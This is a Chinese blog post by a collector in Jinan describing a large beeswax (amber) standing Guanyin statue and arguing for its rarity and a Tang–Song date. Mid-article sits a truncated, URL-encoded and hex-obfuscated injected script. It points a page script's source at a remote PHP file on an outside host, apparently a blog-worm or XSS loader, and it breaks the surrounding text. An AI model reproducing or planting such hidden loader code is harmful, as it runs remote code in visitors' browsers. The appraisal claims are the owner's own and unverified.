注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

尚古玉

崇尚 收藏 鉴识 研究 高古玉器 《尚古玉堂》藏品展

 
 
 

日志

 
 
关于我

尚古玉堂主人 山东周易研究会常务理事 中国古玉器研究会会员 山东省收藏家协会会员

网易考拉推荐

【瑰宝奇观】 蜜蜡观音立像  

2010-08-12 17:31:58|  分类: 瑰宝奇观 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 

【瑰宝奇观】                              蜜 蜡 观 音 立 像

                                                                                                                                              ◎尚古玉

笔者有幸收藏了一件珍稀罕见的蜜蜡观音立像,全身金黄光泽的观音菩萨,身着开胸圆领长袍袈裟,胸前装饰联珠璎珞,左手握右腕放于腹前,右手握提长串垂珠,跣足立于双瓣覆莲圆座上;观音头梳花缦高髻,髻前有小化佛,髻后有椭圆光背;观音面庞圆润,双目微合,神态安宁,庄重典雅(见图1、2、3)。

笔者说此观音立像珍稀罕见,有理由如下:

一是蜜蜡材质的硕大雕像极为罕见。蜜蜡的生成原理虽然同于琥珀,然生成年代则远长于琥珀,所以蜜蜡成色并不同于琥珀,琥珀通常为透明的棕红色,而蜜蜡则为不透明的明黄色,且内有不规则的云雾状花纹。看此雕像材质符合蜜蜡特质,全身为不透明的金黄色,局部内里可见金色绞丝花纹,几处内层还隐约可见包裹物,实属典型的蜜蜡无疑。蜜蜡为佛教七宝之一,常用于雕琢佛珠,因蜜蜡资源缺乏,大件的原料几乎没有,由蜜蜡雕成的观音和佛像,寻常所见的多为五六公分高,最大的不过十几公分,而此像竟高达32公分,重约1130克,硕大无比,世所罕见。

二是雕琢工艺精湛。巧妙利用蜜蜡纹理色彩,避开暗淡无色的花绺,选用光彩夺目的金黄色块,突出表现观音的面部、手部、衣褶和莲座,观者看去,明显感觉观音的面部表情丰富,手部形状精确,衣纹飘洒流动,莲座华丽庄重,整体焕发灿烂光芒,彰显出观世音菩萨的光辉形象。

三是立姿观音像较为少见。常见的观音像都是坐姿,如笔者所藏的一件玉观音,即为双腿结跏趺坐于莲花座上(见图4),一般为盘膝交叠双腿的全跏趺坐,还有作一趺置一股的半跏趺坐,而站立姿态的观音像则很少见到。坐姿观音之所以常见,除了作为佛教的经典姿态外,恐怕也有可能因为塑造立像的的高大蜜蜡原料殊为难得。目前世所见到的立姿观音像,多为象牙或木质的,象牙和树木均为长柱体,易于制作高长型立姿雕像,其它材料则很难如意了,而高大的蜜蜡立像更是难得一见。

四是观音头后的椭圆光背极少见到。观音头后的光背只在南北朝石雕和敦煌壁画中见到,且一般为同心圆光背或火焰纹镂空光环,而宋元以后的观音雕像头部常作高髻或戴宝冠,因而绝少见到椭圆型素面光背。平面的壁画或浮雕的圆形光背容易做出,而立体的圆雕像上的薄片弧面光盘极难雕琢,这难度甚大的工艺,可能也是观音雕像少见椭圆薄片光背的原因之一。

五是观音足下的双瓣覆莲圆座甚少见到。一般的莲花座为仰莲座或束腰仰覆双层莲座,单层的覆莲圆座很少见到。即便偶见少有的覆莲座,其莲花也是单花瓣,所以此观音立足的双花瓣覆莲圆座,较为罕见。

六是观音的手势造型也不多见。一般观音像的手势为右手作无畏印,左手作与愿印,或双手合掌于胸前,另外的拈花观音、滴水观音、数珠观音、水月观音、送子观音等,其手势常作拈花、持柳、捧瓶、捏珠、抱子或各式手印,象此类双手垂合提珠的姿势较为少见。观音手势大概因时代使然,拈花观音、滴水观音、水月观音、送子观音等,多见于元明以后,垂手提珠的姿势在北朝石雕和敦煌壁画中偶能见到,由此姿态,似可将此观音像断代为隋唐时期作品。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<六是年代较为久远。早期(东汉至隋唐)的观世音菩萨形象为男性,中期(隋唐至宋)的观音形象则呈中性化,可变男、女二身,晚期(元明至清)的观音形象便愈来愈女性化了。观此尊蜜蜡观音形象,可谓不男不女、似男似女的中性化,看其圆削溜肩、丰腴肌肤和微凸的平胸,似为女性,但又无后期女观音的丰乳、肥臀、细腰及婀娜曲线。由此可以看出,这类基本中性化又略带女性特征的造型,当属唐宋之间过渡时期的观音形象。另外,还可从观音的体型和装束方面看出时代特色。宋元以后的观音像,体型苗条瘦长,装束简约质朴,这缘于宋后崇尚“清瘦”的审美习惯和逐渐世俗化的趋势。观此蜜蜡观音体态丰满、胖头大脸,宽服博袖,雍容大度,正合唐代“肥胖”的审美习惯;而其装饰繁缛、华美亮丽,颇具唐代贵族仕女风采,正合名家所言的“唐代菩萨如宫娃”之典型风格。

综上所述,笔者初步将此蜜蜡观音立像判断为唐宋之间作品,根据其硕大的材质、独特的造型、精湛的工艺和完美的品相,而标榜其为珍稀罕见的艺术瑰宝。

                                                                                                 2010年8月于济南“尚古玉堂”

附图:(若不显示,请看本博相册《博文附图》分册)

【瑰宝奇观】 蜜 蜡 观 音 立 像 - 尚古玉 - 尚古玉【瑰宝奇观】 蜜 蜡 观 音 立 像 - 尚古玉 - 尚古玉  

                图1 蜜蜡观音立像                                                  图2 蜜蜡观音侧像

【瑰宝奇观】 蜜 蜡 观 音 立 像 - 尚古玉 - 尚古玉【瑰宝奇观】 蜜 蜡 观 音 立 像 - 尚古玉 - 尚古玉  

              图3 蜜蜡观音背光像                                                     图4 坐姿玉观音

  评论这张
 
阅读(404)| 评论(9)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017